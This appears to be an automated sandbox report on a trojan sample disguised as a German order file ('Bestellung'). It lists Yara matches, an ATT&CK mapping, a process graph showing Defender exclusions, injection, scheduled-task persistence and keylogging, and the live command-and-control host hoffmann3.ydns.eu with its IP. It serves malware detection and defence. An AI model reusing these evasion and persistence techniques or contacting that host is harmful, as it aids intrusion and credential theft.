                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeQueries volume information: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeQueries volume information: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Queries volume information: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Queries volume information: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match | File source: 9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 13.2.outlooks.exe.4ba1d80.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 13.2.outlooks.exe.4ba1d80.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000A.00000002.1683887266.00000000026A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.1477097522.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000D.00000002.1555939194.00000000033C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1448519828.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.1685100686.00000000033FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000016.00000002.3874269347.0000000003642000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.1477097522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1464511092.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1501954839.000000000AFC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000D.00000002.1578699518.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: Bestellung - 021224 - 901003637.exe PID: 6052, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: Bestellung - 021224 - 901003637.exe PID: 2288, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: eNuXmIwkixzW.exe PID: 3020, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: outlooks.exe PID: 3648, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: outlooks.exe PID: 4936, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: outlooks.exe PID: 6088, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.outlooks.exe.4ba1d80.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.outlooks.exe.4ba1d80.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.1683887266.00000000026A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1477097522.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1555939194.00000000033C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1448519828.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1685100686.00000000033FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.3874269347.0000000003642000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1477097522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1464511092.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1501954839.000000000AFC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1578699518.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Bestellung - 021224 - 901003637.exe PID: 6052, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Bestellung - 021224 - 901003637.exe PID: 2288, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: eNuXmIwkixzW.exe PID: 3020, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: outlooks.exe PID: 3648, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: outlooks.exe PID: 4936, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: outlooks.exe PID: 6088, type: MEMORYSTR

ATT&CK Matrix

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 21 Windows Management Instrumentation | 1 Scheduled Task/Job | 111 Process Injection | 1 Masquerading | 11 Input Capture | 1 Query Registry | Remote Services | 11 Input Capture | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 11 Disable or Modify Tools | LSASS Memory | 111 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 111 Process Injection | NTDS | 41 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Hidden Files and Directories | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | 113 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Obfuscated Files or Information | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 23 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior Graph ID: 1567415
Sample: Bestellung - 021224 - 90100...
Startdate: 03/12/2024
Architecture: WINDOWS
Score: 100

Graph nodes and edges (node id, label, edge from parent node):
• 90 hoffmann3.ydns.eu (2->90)
• 92 ipwho.is (2->92)
• 94 bg.microsoft.map.fastly.net (2->94)
• 100 Suricata IDS alerts for network traffic (2->100)
• 102 Found malware configuration (2->102)
• 104 Malicious sample detected (through community Yara rule) (2->104)
• 106 14 other signatures (2->106)
• 11 Bestellung - 021224 - 901003637.exe 7 (2->11, started)
• 15 outlooks.exe (2->15, started)
• 17 eNuXmIwkixzW.exe 5 (2->17, started)
• 82 C:\Users\user\AppData\...\eNuXmIwkixzW.exe, PE32 (11->82, dropped)
• 84 C:\Users\...\eNuXmIwkixzW.exe:Zone.Identifier, ASCII (11->84, dropped)
• 86 C:\Users\user\AppData\Local\...\tmpB9B7.tmp, XML (11->86, dropped)
• 88 Bestellung - 021224 - 901003637.exe.log, ASCII (11->88, dropped)
• 126 Adds a directory exclusion to Windows Defender (11->126)
• 128 Injects a PE file into a foreign processes (11->128)
• 19 Bestellung - 021224 - 901003637.exe 4 (11->19, started)
• 23 powershell.exe 23 (11->23, started)
• 25 powershell.exe 23 (11->25, started)
• 27 schtasks.exe 1 (11->27, started)
• 29 powershell.exe (15->29, started)
• 31 powershell.exe (15->31, started)
• 37 2 other processes (15->37)
• 130 Antivirus detection for dropped file (17->130)
• 132 Multi AV Scanner detection for dropped file (17->132)
• 134 Machine Learning detection for dropped file (17->134)
• 33 schtasks.exe (17->33, started)
• 35 eNuXmIwkixzW.exe (17->35, started)
• 80 C:\Users\user\AppData\...\outlooks.exe, PE32 (19->80, dropped)
• 108 Hides that the sample has been downloaded from the Internet (zone.identifier) (19->108)
• 39 outlooks.exe (19->39, started)
• 42 schtasks.exe (19->42, started)
• 110 Loading BitLocker PowerShell Module (23->110)
• 44 conhost.exe (23->44, started)
• 46 conhost.exe (25->46, started)
• 48 conhost.exe (27->48, started)
• 50 conhost.exe (29->50, started)
• 52 conhost.exe (31->52, started)
• 54 conhost.exe (33->54, started)
• 56 conhost.exe (37->56, started)
• 112 Antivirus detection for dropped file (39->112)
• 114 Multi AV Scanner detection for dropped file (39->114)
• 116 Machine Learning detection for dropped file (39->116)
• 118 2 other signatures (39->118)
• 58 outlooks.exe (39->58, started)
• 62 powershell.exe (39->62, started)
• 64 powershell.exe (39->64, started)
• 66 schtasks.exe (39->66, started)
• 68 conhost.exe (42->68, started)
• 96 hoffmann3.ydns.eu 193.34.212.17, 49713, 5829 PL-SKYTECH-ASPL Poland (58->96)
• 98 ipwho.is 103.126.138.87, 443, 49716 AS40676US United States (58->98)
• 120 Hides that the sample has been downloaded from the Internet (zone.identifier) (58->120)
• 122 Installs a global keyboard hook (58->122)
• 70 schtasks.exe (58->70, started)
• 124 Loading BitLocker PowerShell Module (62->124)
• 72 conhost.exe (62->72, started)
• 74 conhost.exe (64->74, started)
• 76 conhost.exe (66->76, started)
• 78 conhost.exe (70->78, started)

Source | Detection | Scanner | Label
Bestellung - 021224 - 901003637.exe | 47% | ReversingLabs | Win32.Trojan.Nekark
Bestellung - 021224 - 901003637.exe | 100% | Avira | HEUR/AGEN.1357257
Bestellung - 021224 - 901003637.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | 100% | Avira | HEUR/AGEN.1357257
C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | 100% | Avira | HEUR/AGEN.1357257
C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | 47% | ReversingLabs | Win32.Trojan.Nekark
C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | 47% | ReversingLabs | Win32.Trojan.Nekark

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
hoffmann3.ydns.eu | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high
hoffmann3.ydns.eu | 193.34.212.17 | true | true | | unknown
ipwho.is | 103.126.138.87 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
hoffmann3.ydns.eu | true | Avira URL Cloud: malware | unknown
https://ipwho.is/ | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
